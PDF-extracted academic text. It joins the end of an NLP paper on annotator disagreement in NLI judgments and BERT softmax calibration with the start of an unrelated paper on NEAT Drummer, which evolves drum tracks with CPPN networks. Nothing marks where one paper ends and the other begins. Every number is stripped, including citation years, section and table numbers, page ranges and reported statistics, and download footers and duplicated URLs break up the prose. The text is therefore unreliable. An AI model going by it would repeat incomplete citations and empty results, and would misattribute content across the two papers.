for each of individual corpora, so we report only the aggregate results. judges. the log probability assigned to the ob- servations (i.e., the set of human labels) by the predicted (softmax) multinomial is significantly and substantially lower than the probability that we would expect to be assigned if the observations had been in fact sampled from the predicted distribution. similarly, the cross entropy between the predicted and the observed distribution is significantly higher than what can be attributed to random noise (table ). figure shows some examples of p/h pairs for which the softmax substantially misrepresents the nature of the uncertainty that exists among the human labels, in one case because the model predicts with certainty when humans find the judgment ambiguous (due to the need to resolve an ambiguous co-reference) and in the other because the model suggests ambiguity when humans are in clear consensus. overall, the results indicate that while softmax allows the model to represent uncertainty in the nli task, this uncertainty does not necessarily mimic the uncertainty that exists among humans’ perceptions about which inferences can and cannot be made. it is worth noting that the softmax distributions tend to reflect the model’s confidence on the dataset as a whole, rather than uncertainty on individual examples. for example, in the rte dataset, the model nearly always splits probability mass over multiple labels, whereas in snli, the model typically concentrates probability mass onto a single label. this is not surprising behavior, but serves to corroborate the claim that modeling probabilistic entailment via softmax layers does figure : examples of p/h pairs on which the model’s predictions about the distribution (blue) misrepresent the nature of the uncertainty observed among human judgments (orange). in the first example (from rte ) the model assumes ambiguity when humans consider the inference to be unambiguous (cross-ent = . ; pmf = . e- ). in the second example (from snli) the model is certain when humans are actually in disagreement (cross-ent = . ; pmf = . e- ) not correspond to modeling annotator uncertainty about inference judgments on specific items. discussion the results in sections and suggest that ) human nli judgments are not adequately captured by a single aggregate score and ) nli systems trained to predict an aggregate score do not learn human-like models of uncertainty ‘‘for free’’. these takeaways are significant for work in computational semantics and language technology in general primarily because nli has, historically (cooper et al., ; dagan et al., ) as well as presently (white et al., ), been proposed as a means for evaluating a model’s ‘‘intrinsic’’ understanding of language: as originally framed by dagan et al. ( ), nli was proposed as an intermediate task for evaluating whether a model will be useful in applications, and currently, nli is increasingly used as a means for ‘‘probing’’ neural models to assess their knowledge of arbitrary linguistic phenomena (dasgupta et al., ; ettinger et al., ; poliak et al., b; white et al., ; poliak et al., a; mccoy et al., ). in other words, nli has largely become an evalu- ation lingua franca through which we diagnose what a semantic representation knows. with the increased interest in ‘‘general-purpose’’, ‘‘task downloaded from http://www.mitpressjournals.org/doi/pdf/ . /tacl_a_ by carnegie mellon university user on april independent’’ semantic representations, , it is particularly important that intrinsic evaluations are reliable, if comparison of such representations are to be meaningful. as discussed, the preference among many in nlp (the authors included) is to avoid tasks which take a prescriptivist approach to language and meaning. instead, we attempt to design tasks which capture humans’ linguistic behavior in as natural a setting as possible (acknowledging that truly natural annotation is difficult) with the hope that models trained to perform such tasks will be the best match for the ‘‘real world’’ settings in which we hope to deploy them. that is, we generally prefer to punt on precise definitions, and instead train our models to ‘‘do what humans do’’. in this paper, we have shown that defining ‘‘what humans do’’ is not straightforward, as humans do not necessarily handle ambiguity or communi- cate uncertainty in the same way as one another. thus, as was the case for pipelined systems (zadrozny and elkan, ; finkel et al., ; bunescu, ) and related discussions of model calibration (kuleshov and liang, ), we argue that the best approach is to propagate uncertainty downstream, so that end tasks can decide if and how to handle inferences on which humans are likely to disagree. from the point of view of current neural nli models—and the sentence encoders on top of which they are built—this means that a representation should be evaluated in terms of its ability to predict the full distribution of human inferences (e.g., by reporting cross- entropy against a distribution of human ratings), rather than to predict a single aggregate score (e.g., by reporting accuracy against a discrete ma- jority label or correlation with a mean score). we have shown that models that are trained to predict an aggregate score do not, by default, model the same type of uncertainty as that which is captured by distributions over many human raters’ judgments. thus, several challenges would need to be overcome to switch to the proposed nli evaluation. first, nli evaluation sets would need to be annotated by sufficiently many raters such that we can have an accurate estimate of the distribution against which to evaluate. although the data collected for the purposes of this paper https://www.clsp.jhu.edu/workshops/ - workshop/general-purpose-sentence- representation-learning/ https://repeval .github.io could serve as a start towards this end, a larger effort to augment or replace existing evaluation sets with full distributions of judgments would be necessary in order to yield a meaningful redefinition of the nli task. second, changes would be required to enable models to learn to predict these distributions. one approach could be to annotate training data, not just evaluation data, with full distributions, and optimize for the objective directly. this would clearly incur additional costs, but could be overcome with more creative crowdsourcing techniques (dumitrache et al., ; poesio et al., ). however, re- quiring direct supervision of full distributions is arguably an unsatisfying solution: rarely if ever do humans witness multiple people responding to identical stimuli. rather, more plausibly, we form generalizations about the linguistic phenomena that give rise to uncertainty on the basis of a large number of singly labeled examples. thus, ideally, progress can be made by developing new architectures and/or training objectives that enable models to learn a notion of uncertainty that is consistent with the full range of possible human inferences, despite observing labels from only one or a few people on any given p/h pair. overcoming these challenges, and moving towards models which can both understand sources of linguistic uncertainty and anticipate the range of ways that people might resolve it would be exciting both for nli and for representation learning in general. related work defining entailment and nli. as outlined in section , there has been substantive discussion about the definition of the nli task. this debate can largely be reduced to a debate about sentence meaning versus speaker meaning. the former aligns more closely with the goals of formal semantics and seeks a definition of the nli task that precisely circumscribes the ways in which vague notions of ‘‘world knowledge’’ and ‘‘com- mon sense’’ can factor into inference (zaenen et al., ). the latter takes the perspective that the nli task should maintain an informal defi- nition in which p → h as long as h is some- thing that a human would be ‘‘happy to infer’’ from p, where the humans making the inferences are assumed to be ‘‘awake, careful, moderately intelligent and informed . . . but not . . . seman- ticists or similar academics’’ (manning, ). downloaded from http://www.mitpressjournals.org/doi/pdf/ . /tacl_a_ by carnegie mellon university user on april https://www.clsp.jhu.edu/workshops/ -workshop/general-purpose-sentence-representation-learning/ https://www.clsp.jhu.edu/workshops/ -workshop/general-purpose-sentence-representation-learning/ https://www.clsp.jhu.edu/workshops/ -workshop/general-purpose-sentence-representation-learning/ https://repeval .github.io garoufi ( ) provides an overview of attempts that have been made to circumscribe the annota- tion process by providing finer-grained annota- tion options, in order to bring it more in line with the sentence-meaning task definition. westera and boleda ( ), in the context of advocating for distributional models of semantics in general, makes a case in favor of the speaker-meaning ap- proach, arguing that issues like entailment, refer- ence, and truth conditions should not fall within the purview of sentence meaning at all, despite being quintessential topics of formal semantic study. chatzikyriakidis et al. ( ) overview nli datasets, observing that datasets tend to be designed with one of these perspectives in mind, and thus all datasets ‘‘fail to capture the wealth of inferential mechanisms present in nli and seem to be driven by the dominant discourse in the field at the time of their creation.’’ an orthogonal line of discussion about the definition of entailment focuses on the question of whether truth-conditional semantics should be strictly binary (propositions are either true or false) or rather treated as continuous/probabilistic val- ues. currently, at least within computationally minded work on textual inference, the prevailing opinion is in favor of the latter (i.e., allowing semantic judgments to be probabilistic) with few (if any) advocating that we should build systems that only support discrete true/false decisions. still, significant theoretical and algorithmic work has gone into making probabilistic logics work in practice. such work includes (controversial) for- malisms such as fuzzy set theory (zadeh, , ), as well as more generally accepted formal- isms which assume access to boolean ground- ings, such as probabilistic soft logic (friedman et al., ; kimmig et al., ; beltagy et al., ) and markov logic networks (richardson and domingos, ). also related is work on collecting and analyzing graded entailment judg- ments (de marneffe et al., ). we note that the question of strict vs. graded entailment judg- ments pertains to modeling of uncertainty within an individual rater’s judgments. this is indepen- dent of the question of if/how to model disagree- ments between raters, which is the our focus in this work. embracing rater disagreement. significant past work has looked an annotator disagreement in linguistic annotations, and has advocated that this disagreement should be taken as signal rather than noise (aroyo et al., ; palomaki et al., ). plank et al. ( ) showed that incorporating rater uncertainty into the loss function for a pos tagger improves downstream performance. similar approaches have been applied in parsing (martı́nez alonso et al., ) and supersense tagging (martı́nez alonso et al., ). specif- ically relevant to this work is past discussion of disagreement on semantic annotation tasks, in- cluding anaphora resolution (poesio and artstein, ), coreference (versley, ; recasens et al., ), word sense disambiguation (erk and mccarthy, ; passonneau et al., ; jurgens, ), veridicality (geis and zwicky, ; karttunen et al., ; de marneffe et al., ), semantic frames (dumitrache et al., ), and grounding (reidsma and op den akker, ). most of this work focuses on the uncertainty of individual raters, oftentimes concluding that such uncertainty can be addressed by shifting to a graded rather than discrete labeling schema and/or that uncertainty can be leveraged as a means for detecting inherently ambiguous items. in contrast, we do not look at measures of uncertainty/ambiguity from the point of view of an individual (though this is a very interest- ing question); rather, we focus on disagreements that exist between raters. we agree strongly that semantic judgments should be treated as graded, and that ambiguous items should be acknowl- edged as such. still, this is independent of the issue of inter-rater disagreement: two raters can disagree when making graded judgments as much as they can when making discrete judgments, and they can disagree when they are both uncertain as much as they can when they are both certain. thus, the central question of this work is whether aggre- gation (via average or majority vote) is a faith- ful representation of the underlying distribution of judgments across annotators. arguably, such aggregation is a faithful (albeit lossy) representa- tion of high-variance unimodal distributions, but not of multi-modal ones. in this regard, particularly relevant to our work is de marneffe et al. ( ) and de marneffe et al. ( ), who observed similarly persistent disagreement in graded judgments of veridicality, and made a case for attempting to model the full distribution as opposed to a single aggregate score. smith et al. ( ) present related theoretical work, which proposes specific mechanisms by downloaded from http://www.mitpressjournals.org/doi/pdf/ . /tacl_a_ by carnegie mellon university user on april which humans might handle lexical uncertainty in the context of inference. their model assumes pragmatic speakers and listeners who reason simultaneously about one another’s goals and about the lexicon itself, and could be used to explain differing inferences in cases where raters share different beliefs about the speaker (author) of p and/or about the lexicon. schaekermann et al. ( ) develop a proof-of-concept annotation in- terface specifically intended to recognize whether or not inter-rater disagreement is ‘‘resolvable’’ via more annotation, or rather is likely to persist, although they don’t discuss natural language semantics directly. finally, tanenhaus et al. ( ) discuss the role of formal semantics and generative grammar in inference, and specifically differentiates between work which treats grammar as a causal process of how inferences occur versus work which treats grammar as a descriptive framework of the structure of language. such dis- cussion is relevant going forward, as engineers of nli systems must determine both how to define the evaluation task, as well as the role that concepts from formal semantics should play within such systems. conclusion we provide an in-depth study of disagreements in human judgments on the nli task. we show that many disagreements persist even after increasing the number of annotators and the amount of context provided, and that models which represent these annotations as multimodal distributions gen- eralize better to held-out data than those which do not. we evaluate whether a state-of-the-art nli model (bert) captures these disagreements by virtue of producing softmax distributions over labels and show that it does not. we argue that, if nli is to serve as an adequate intrinsic evaluation of semantic representations, then models should be evaluated in terms of their ability to predict the full expected distribution over all human raters, rather than a single aggregate score. acknowledgments thank you to the action editor chris potts and the anonymous reviewers for their input on earlier drafts of this paper. this work evolved substantially as a result of their suggestions and feedback. thank you to dipanjan das, michael collins, sam bowman, ankur parikh, emily pitler, yuan zhang, and the rest of the google language team for many useful discussions. references lora aroyo, anca dumitrache, praveen paritosh, alex quinn, and chris welty, editors. . proc. subjectivity, ambiguity and disagree- ment in crowdsourcing (sad), volume of . hcomp, zurich, switzerland. islam beltagy, katrin erk, and raymond mooney. . probabilistic soft logic for semantic tex- tual similarity. in proceedings of the nd annual meeting of the association for compu- tational linguistics (volume : long papers), pages – , baltimore, md. association for computational linguistics. samuel r. bowman, gabor angeli, christopher potts, and christopher d. manning. . a large annotated corpus for learning natural lan- guage inference. in proceedings of the conference on empirical methods in nat- ural language processing, pages – , lisbon, portugal. association for computa- tional linguistics. razvan bunescu. . learning with probabilis- tic features for improved pipeline models. in proceedings of the conference on empir- ical methods in natural language processing, pages – , honolulu, hi. association for computational linguistics. chris callison-burch and mark dredze. . creating speech and language data with amazon’s mechanical turk. in proceedings of the naacl hlt workshop on creating speech and language data with amazon’s me- chanical turk, pages – , los angeles, ca. association for computational linguistics. stergios chatzikyriakidis, robin cooper, simon dobnik, and staffan larsson. . an over- view of natural language inference data col- lection: the way forward? in proceedings of the computing natural language inference workshop. timothy chklovski and patrick pantel. . verbocean: mining the web for fine-grained semantic verb relations. in proceedings of downloaded from http://www.mitpressjournals.org/doi/pdf/ . /tacl_a_ by carnegie mellon university user on april the conference on empirical methods in natural language processing, pages – , barcelona, spain. association for computa- tional linguistics. robin cooper, dick crouch, jan van eijck, chris fox, johan van genabith, jan jaspars, hans kamp, david milward, manfred pinkal, massimo poesio, and steve pullman. , using the framework. technical report, technical report lre - d- , the fracas consortium. ido dagan, oren glickman, and bernardo magnini. , the pascal recognising tex- tual entailment challenge. in machine learning challenges. evaluating predictive uncertainty, visual object classification, and recognising textual entailment, pages – . springer ishita dasgupta, demi guo, andreas stuhlmüller, samuel j. gershman, and noah d. goodman. . evaluating compositionality in sentence embeddings. arxiv preprint arxiv: . . jacob devlin, ming-wei chang, kenton lee, and kristina toutanova. . bert: pre- training of deep bidirectional transformers for language understanding. in proceedings of the conference of the north american chapter of the association for computational linguistics: human language technolo- gies, volume (long and short papers), pages – , minneapolis, mn. associ- ation for computational linguistics. anca dumitrache, lora aroyo, and chris welty. . a crowdsourced frame disambiguation corpus with ambiguity. in proceedings of the conference of the north american chapter of the association for computational linguistics: human language technologies, volume (long and short papers), pages – , minneapolis, mn. association for com- putational linguistics. anca dumitrache, lora aroyo, christopher a. welty, robert-jan sips, and anthony levas. . dr. detective: combining gamification techniques and crowdsourcing to create a gold standard for the medical domain. in crowdsem workshop at the international semantic web conference. katrin erk and diana mccarthy. . graded word sense assignment. in proceedings of the conference on empirical methods in natural language processing, pages – , singapore. association for computational linguistics. allyson ettinger, ahmed elgohary, colin phillips, and philip resnik. . assessing composition in sentence vector representations. in proceedings of the th international conference on computational linguistics, pages – , santa fe, nm. association for computational linguistics. christiane fellbaum. . wordnet, wiley online library. jenny rose finkel, christopher d. manning, and andrew y. ng. . solving the problem of cascading errors: approximate bayesian inference for linguistic annotation pipelines. in proceedings of the conference on empirical methods in natural language pro- cessing, pages – , sydney, australia. association for computational linguistics. nir friedman, lise getoor, daphne koller, and avi pfeffer. . learning probabilistic relational models. in ijcai, : – . konstantina garoufi. . towards a better understanding of applied textual entailment. ph.d. thesis, citeseer. michael l. geis and arnold m. zwicky. . on invited inferences. linguistic inquiry, ( ): – . marti a. hearst. . automatic acquisition of hyponyms from large text corpora. in coling volume : the th international con- ference on computational linguistics. rafal józefowicz, oriol vinyals, mike schuster, noam shazeer, and yonghui wu. . exploring the limits of language modeling. arxiv, abs/ . . david jurgens. . embracing ambiguity: a comparison of annotation methodologies for crowdsourcing word sense labels. in proceedings of the conference of the north american chapter of the association for computational linguistics: human language technologies, pages – , atlanta, ga. association for computational linguistics. downloaded from http://www.mitpressjournals.org/doi/pdf/ . /tacl_a_ by carnegie mellon university user on april lauri karttunen, stanley peters, annie zaenen, and cleo condoravdi. . the chameleon- like nature of evaluative adjectives. empirical issues in syntax and semantics, : – . angelika kimmig, stephen bach, matthias broecheler, bert huang, and lise getoor. . a short introduction to probabilistic soft logic. in proceedings of the nips workshop on probabilistic programming: foundations and applications, pages – . volodymyr kuleshov and percy s. liang. . calibrated structured prediction. in advances in neural information processing systems, pages – . christopher d. manning. . local textual inference: its hard to circumscribe, but you know it when you see it–and nlp needs it. https://nlp.stanford.edu/manning/papers/textual inference.pdf marie-catherine de marneffe, mandy simons, and judith tonhauser. . factivity in doubt: clause-embedding predicates in naturally occurring discourse. sinn und bedeutung (poster). marie-catherine de marneffe, christopher d. manning, and christopher potts. . did it happen? the pragmatic complexity of verid- icality assessment. computational linguistics, ( ): – . héctor martı́nez alonso, anders johannsen, and barbara plank. . supersense tagging with inter-annotator disagreement. in proceedings of the th linguistic annotation workshop held in conjunction with acl (law-x ), pages – , berlin, germany. association for computational linguistics. héctor martı́nez alonso, barbara plank, arne skjærholt, and anders søgaard. . learning to parse with iaa-weighted loss. in proceed- ings of the conference of the north american chapter of the association for com- putational linguistics: human language tech- nologies, pages – , denver, co. association for computational linguistics. tom mccoy, ellie pavlick, and tal linzen. . right for the wrong reasons: diagnosing syn- tactic heuristics in natural language inference. in proceedings of the th annual meeting of the association for computational lin- guistics, pages – , florence, italy. association for computational linguistics. richard montague. . universal grammar. theoria, ( ): – . jennimaria palomaki, olivia rhinehart, and michael tseng. . a case for a range of acceptable annotations. in proceedings of workshop on subjectivity, ambiguity, and disagreement (sad). hcomp. rebecca j. passonneau, vikas bhardwaj, ansaf salleb-aouissi, and nancy ide. . multi- plicity and word sense: evaluating and learning from multiply labeled word sense annota- tions. language resources and evaluation, ( ): – . ellie pavlick and chris callison-burch. a. most ‘‘babies’’ are ‘‘little’’ and most ‘‘prob- lems’’ are ‘‘huge’’: compositional entailment in adjective-nouns. in proceedings of the th annual meeting of the association for compu- tational linguistics (volume : long papers), pages – , berlin, germany. associa- tion for computational linguistics. ellie pavlick and chris callison-burch. b. so-called non-subsective adjectives. in pro- ceedings of the fifth joint conference on lexical and computational semantics, pages – , berlin, germany. association for computational linguistics. barbara plank, dirk hovy, and anders søgaard. . learning part-of-speech taggers with inter-annotator agreement loss. in proceedings of the th conference of the european chapter of the association for computational lin- guistics, pages – , gothenburg, sweden. association for computational linguistics. massimo poesio and ron artstein. . the reli- ability of anaphoric annotation, reconsidered: taking ambiguity into account. in proceed- ings of the workshop on frontiers in corpus annotations ii: pie in the sky, pages – , ann arbor, mi. association for computational linguistics. massimo poesio, jon chamberlain, silviu paun, juntao yu, alexandra uma, and udo kruschwitz. downloaded from http://www.mitpressjournals.org/doi/pdf/ . /tacl_a_ by carnegie mellon university user on april . a crowdsourced corpus of multiple judg- ments and disagreement on anaphoric interpre- tation. in proceedings of the conference of the north american chapter of the association for computational linguistics: human lan- guage technologies, volume (long and short papers), pages – , minneapolis, mn. association for computational linguistics. adam poliak, yonatan belinkov, james glass, and benjamin van durme. a. on the evaluation of semantic phenomena in neural machine translation using natural language inference. in proceedings of the conference of the north american chapter of the association for computational linguistics: human lan- guage technologies, volume (short papers), pages – , new orleans, la. association for computational linguistics. adam poliak, aparajita haldar, rachel rudinger, j. edward hu, ellie pavlick, aaron steven white, and benjamin van durme. b. collecting diverse natural language inference problems for sentence representation evalua- tion. in proceedings of the conference on empirical methods in natural language processing, pages – , brussels, belgium. association for computational linguistics. marta recasens, eduard hovy, and m. antònia martı́. . identity, non-identity, and near- identity: addressing the complexity of coref- erence. lingua, ( ): – . dennis reidsma and rieks op den akker. . exploiting ‘subjective’ annotations. in coling : proceedings of the workshop on hu- man judgements in computational linguistics, pages – , manchester, uk. coling organizing committee. matthew richardson and pedro domingos. . markov logic networks. machine learning, ( – ): – . mike schaekermann, edith law, alex c. williams, and william callaghan. . re- solvable vs. irresolvable ambiguity: a new hybrid framework for dealing with uncertain ground truth. in st workshop on human- centered machine learning at sigchi. mandy simons, judith tonhauser, david beaver, and craige roberts. . what projects and why. semantics and linguistic theory, : – . nathaniel j. smith, noah goodman, and michael frank. . learning and using language via recursive pragmatic reasoning about other agents. in advances in neural information processing systems, pages – . rion snow, brendan o’connor, daniel jurafsky, and andrew ng. . cheap and fast—but is it good? evaluating non-expert annotations for natural language tasks. in proceedings of the conference on empirical methods in natural language processing, pages – , honolulu, hi. association for computational linguistics. m. tanenhaus, g. carlson, and m. s. seidenberg. . do listeners compute linguistic repre- sentations? d. dowty, l. karttunen, and a. zwicky, editors, natural language parsing. cambridge university press. judith tonhauser, david i. beaver, and judith degen. . how projective is projective con- tent? gradience in projectivity and at-issueness. journal of semantics, ( ): – . y. versley. . vagueness and referential ambiguity in a large-scale annotated corpus. re- search on language and computation, : – . matthijs westera and gemma boleda. . don’t blame distributional semantics if it can’t do entailment. in proceedings of the th international conference on computational semantics - long papers, pages – , gothenburg, sweden. association for com- putational linguistics. aaron s. white, valentine hacquard, and jeffrey lidz. . semantic information and the syntax of propositional attitude verbs. cognitive science, ( ): – . aaron steven white, pushpendre rastogi, kevin duh, and benjamin van durme. . in- ference is everything: recasting semantic resources into a unified evaluation framework. in proceedings of the eighth international joint conference on natural language processing (volume : long papers), pages – , downloaded from http://www.mitpressjournals.org/doi/pdf/ . /tacl_a_ by carnegie mellon university user on april taipei, taiwan. asian federation of natural language processing. aaron steven white and kyle rawlins. . the role of veridicality and factivity in clause selection. th annual meeting of the north east linguistic society, reykjavı́k. http:// iceland .nelsconference.org/wp-content/ uploads/ / /white-rawlins.pdf. adina williams, nikita nangia, and samuel bowman. . a broad-coverage challenge corpus for sentence understanding through inference. in proceedings of the con- ference of the north american chapter of the association for computational linguistics: human language technologies, volume (long papers), pages – , new orleans, la. association for computational linguistics. lotfi a. zadeh. . fuzzy logic, neural net- works, and soft computing. communications of the acm, ( ): – . lotfi a. zadeh. . fuzzy logic = computing with words. ieee transactions on fuzzy sys- tems, ( ): – . bianca zadrozny and charles elkan. . transforming classifier scores into accurate multiclass probability estimates. in proceedings of the eighth acm sigkdd international conference on knowledge discovery and data mining, pages – . acm. annie zaenen, lauri karttunen, and richard crouch. . local textual inference: can it be defined or circumscribed? in proceedings of the acl workshop on empirical modeling of semantic equivalence and entailment, pages – , ann arbor, mi. association for computational linguistics. sheng zhang, rachel rudinger, kevin duh, and benjamin van durme. . ordinal common-sense inference. transactions of the association for computational linguistics, : – . https://www.aclweb.org/anthology/ q - . doi: . /tac a . downloaded from http://www.mitpressjournals.org/doi/pdf/ . /tacl_a_ by carnegie mellon university user on april http://iceland .nelsconference.org/wp-content/uploads/ / /white-rawlins.pdf http://iceland .nelsconference.org/wp-content/uploads/ / /white-rawlins.pdf http://iceland .nelsconference.org/wp-content/uploads/ / /white-rawlins.pdf https://www.aclweb.org/anthology/q - https://www.aclweb.org/anthology/q - introduction the rte/nli task nli data and annotation sentence pairs annotation preprocessing analysis of human judgments experimental design results analysis of model predictions motivation experimental design results discussion related work conclusion exploiting functional relationships in musical composition amy k. hoover and kenneth o. stanley evolutionary complexity research group school of electrical engineering and computer science university of central florida orlando, fl - usa {ahoover, kstanley}@eecs.ucf.edu http://eplex.cs.ucf.edu/neatmusic to appear in: connection science special issue on music, brain, & cognition, abington, uk: taylor & francis, : , - , june . abstract the ability of gifted composers such as mozart to create complex mul- tipart musical compositions with relative ease suggests a highly efficient mechanism for generating multiple parts simultaneously. computational models of human music composition can potentially shed light on how such rapid creativity is possible. this paper proposes such a model based on the idea that the multiple threads of a song are temporal patterns that are functionally related, which means that one instrument’s sequence is a function of another’s. this idea is implemented in a program called neat drummer that interactively evolves a type of artificial neural net- work (ann) called a compositional pattern producing network (cppn), which represents the functional relationship between the instruments and drums. the main result is that richly textured drum tracks that tightly follow the structure of the original song are easily generated because of their functional relationship to it. keywords: compositional pattern producing networks; cppns; computer- generated music; interactive evolutionary computation; iec; neuroevo- lution of augmenting topologies introduction a most intriguing capability of human composers is that they can often quickly conceive multiple instrumental parts simultaneously during the creative process. for example, mozart could hear complex multipart pieces form “in his head,” suggesting a powerful creative mechanism for generating accompaniment (rup- pel, ; deutsch, ; hymer, ). relatedly, rock guitarists in jam ses- sions and jazz musicians can improvise together while simultaneously perfectly respecting the interdependencies of their separate parts (barrett, ; berliner, ; katz and longden, ; oliver, ; schuller, ; weick, ). thus although intuition may suggest that complex interdependent construc- tions should require care and labor to devise, in fact such constructions in music appear almost effortless. thus it is likely that no explicit serial reasoning is in- volved in the creative construction of accompanying instrumental tracks. what kind of mechanism then is responsible for such a capability? this paper suggests a possible high-level answer to this question. the key idea is that different instrumental parts are functionally related, which means that one can be expressed as a function of another. furthermore, although we may perceive the interplay between two or more simultaneous instruments as rich and complex, in fact the function that relates one to the other can be quite simple. thus, in this view, once a single track such as a melody is created, it can serve as a scaffold, i.e. an existing support structure, upon which other tracks are generated. in this way, while composers may seem to improvise entire harmonies and drum tracks one note at a time, fundamentally they need only construct a simple function for each part that transforms the scaffold. in fact, because the scaffold already in effect embodies the intrinsic con- tours and complexities of the song, any transformation of the scaffold inherits these features and thereby embodies the same thematic elements automatically. thus the space of possible transforming functions is highly forgiving, in part explaining why improvising accompaniment can appear effortless. as long as the accompaniment is expressed as a function of the scaffold, it is difficult to go significantly wrong. while this idea of functions relating one pattern to another is difficult (though not necessarily impossible) to confirm at a neurological level, it does suggest a promising model for computer-generated music. this paper describes the implementation of such a model and presents its results. the goal is to gen- erate drum tracks to accompany existing songs. because rhythm is simpler than melody or harmony, rhythm generation is an appealing stepping stone to full blown harmonization. it effectively highlights the advantages of the functional perspective in clear and simple terms that do not require musical expertise to appreciate. formally, an appealing drum pattern for a particular piece over time can be described as a function of time, f (t). however, a good pattern for a particular drum may be highly complex with respect to t, making its discovery prohibitive. yet given an existing part p(t) (i.e. the scaffold) that varies over time, it is likely significantly easier to discover the pattern g(p(t)) rather than f (t) even though they produce the same pattern. in effect, p makes discovering the accompanying pattern easy because it provides the scaffold, thereby allowing the composer to focus only on devising the much simpler g(p(t)). this idea is implemented in this paper in a program called neat drummer, which automatically generates drum tracks for existing songs. it accepts existing human compositions as input to a type of artificial neural network (ann) called a compositional pattern producing network (cppn; stanley ) and outputs drum patterns to accompany the instruments. the inputs to neat drummer are specific parts of a musical instrument digital interface (midi) file (e.g. the lead guitar, bass guitar, and vocals) and the outputs are drum tracks that are played along with the original midi file. that way, outputs are a function of the original midi file inputs, forcing synchronization with the midi. to take into account the user’s own inclinations, neat drummer allows the user to interactively evolve rhythms from an initial population of drum tracks with the neuroevolution of augmenting topologies (neat) algorithm (stanley and miikkulainen, , ), which can evolve increasingly complex cppn-encoded patterns. the main results are drum tracks for existing songs that tightly follow the contours and idiosyncrasies of individual pieces, yet elaborate and elucidate them in creative and unexpected ways. even when major transitions occur, because the drum tracks are a function of the music, the drums perfectly follow the transitions. this functional model of musical composition is then further extended to allow human users to add their own functional influences to create variational motifs outside the confines of the provided song. for example, users can provide a monotonically increasing function (i.e. time), which suggests change over time even if the underlying scaffold is repetitive. the result is that the drum track can be made to vary exactly as the user requests, while still seamlessly interweaving with the song. these user-provided functions are called conductors in a loose analogy with orchestral conductors, who describe functional contours with their hands that the orchestra follows. the conductors further highlight the simplicity and relative ease of creating subtle overlapping textures through simple functional relationships. to highlight the importance of scaffolding and conductors, several variants of neat drummer without such facilities are compared with neat drummer with its full functionality intact. the result is that the consequent capabilities are significantly impoverished, demonstrating the critical role that scaffolding plays in generating accompaniment. while the main contribution is a powerful new approach to computer-aided musical creativity, the high-level implication for improvisational accompaniment provides an intriguing clue to how such mechanisms may work in the brain. the next section provides background for the approach introduced in this paper. this approach is then described in section and the experimental design is explained in section . results are disclosed in sections and , and discussed in section . background this section first explains interactive evolutionary computation (iec), which is part of the neat drummer approach, and its application to computer- generated music. the section concludes with a review of the neat method. . interactive evolutionary computation neat drummer refines its original drum patterns through a process called interactive evolutionary computation (iec), which means a human, rather than a predefined fitness function, selects the parents of the next generation (takagi, ). iec implementations typically generate a random initial population. the user then selects the most fit individuals from that population to reproduce, resulting in increasingly complex individuals. iec addresses the problem that objective evaluation is difficult in aesthetic or subjective domains such as art and music. by shifting the burden of evalua- tion to the human, the need to formalize subjective quality is avoided. richard dawkins first popularized iec with biomorphs, a visual representation of arti- ficial organisms designed to illustrate evolutionary principles (dawkins, ). biomorphs inspired a proliferation of programs tackling design problems from tool creation (sato and hagiwara, ) and suspension bridges (furuta et al., ) to education, teaching, and story composition (kuriyama and terano, ). because it can harness subjective preferences, a major application of iec is art. the power of this approach is evident in visual domains like the l- system-encoded mutator (lindenmayer, ; todd and latham, ), karl sims’ genetic art (sims, ), and picbreeder (secretan et al., ), a website where users evolve, save, and publish images. picbreeder evolves its images with neat (section . ), the same evolutionary algorithm used by neat drummer. iec has also branched into musical evolution, such as the biomorphs-inspired sonomorphs (nelson, ).the next section reviews several such approaches to computer-generated music, which are often based on iec. . evolutionary computer generated music the idea that computers might be able to compose music has inspired a diversity of approaches. while this section focuses mainly on evolutionary approaches, a broad review of the area can be found in de mantaras and arcos ( ). often computer generated music utilizes iec to leverage the subjective capabilities of average human subjects while avoiding the need for musical expertise. for example, among the first iec music applications is sonomorphs (nelson, ), which encodes rhythms as bit strings in which a note is either on or off. direct representation of this type, wherein each note is represented by a single gene, does not attempt to model how humans encode music neurologically. however, the creative evolutionary process is a metaphor for human composition through variation and refinement. listeners often feel that computer-generated music sounds artificial and uninspired. music generators tend to either evolve a solution to fit a partic- ular a priori style or improvise pieces that often lack a global structure that holds together the entire song (mccormack, ; husbands et al., ). it is common for music generators, such as sonomorphs, conga (tokui and iba, ), gp-music system (johanson and poli, ), and the ga- based iec composition system of onisawa et al. (onisawa et al., ) to focus on composing short phrases rather than on entire songs (nelson, ; biles, ). these short phrases, which are selected and evolved by the user, may be extended through looping or manual juxtaposition, but the overall structure of the song is not itself generated. a notable example of computational improvisation is genjam (biles, ), which composes music in the style of jazz in cooperation with a human musi- cian. genjam listens to human improvisations and interprets and genetically modifies the notes. genjam can also evolve a soloist that is independent of any particular jazz composition by first training from human input. it integrates its improvisations seamlessly into a musical stream by prescripting when in the song improvisation may occur. in this way, it preserves the overall musical structure provided by the human, although it does not innovate at the level of global structure on its own. early connectionist approaches, which also emphasize short phrases, repre- sent change over time through recurrence (todd and loy, ). recurrence means that a network can represent a time series through a pattern of cycling activation. todd and loy (todd and loy, ) first applied recurrent anns to music generation by training them to reproduce patterns with real-time recurrent learning (rtrl). chen and miikkulainen (chen and miikkulainen, ) later combined this recurrent learning approach with evolution based on the idea that a simple recurrent network (srn) can capture a general style of music and then vary it through evolution. this approach succeeded in produc- ing melodies in the style of bela bartok on a local level; however, even with recurrence it is difficult to capture global structure. neat drummer approaches the problem of global structure by generating its rhythms from already-existing instrumental parts that span entire songs, thereby diminishing the need to represent patterns over time through recurrence. the next section describes the neat method that implements evolution in neat drummer. . neuroevolution of augmenting topologies (neat) and cppns neat drummer follows the idea in prior connectionist approaches that an ann can effectively represent music. therefore, a method is needed to allow the user to evolve anns. the neat method, described in this section, is chosen for this purpose in neat drummer because it allows anns to increase in complexity over generations. in particular, neat drummer evolves a neural- based encoding of drum patterns. the neat method was originally developed to solve difficult control and sequential decision tasks. the anns evolved with neat control agents that select actions based on their sensory inputs. while previous methods that evolved anns, i.e. neuroevolution methods, evolved either fixed topology net- works (gomez and miikkulainen, ; saravanan and fogel, ), or arbitrary random-topology networks (yao, ), neat is notable for beginning evolu- tion with a population of small, simple networks and complexifying the network topology over generations into diverse species, leading to increasingly sophisti- cated behavior. this section briefly reviews the neat method; stanley and miikkulainen ( , ) provide complete introductions. neat is based on three key principles. first, to allow ann structures to in- crease in complexity over generations, a method is needed to keep track of which gene is which; otherwise, it is not clear in later generations which individual is compatible with which, or how their genes should be combined to produce off- spring. neat solves this problem by assigning a unique historical marking to every new piece of network structure that appears through a structural muta- tion. 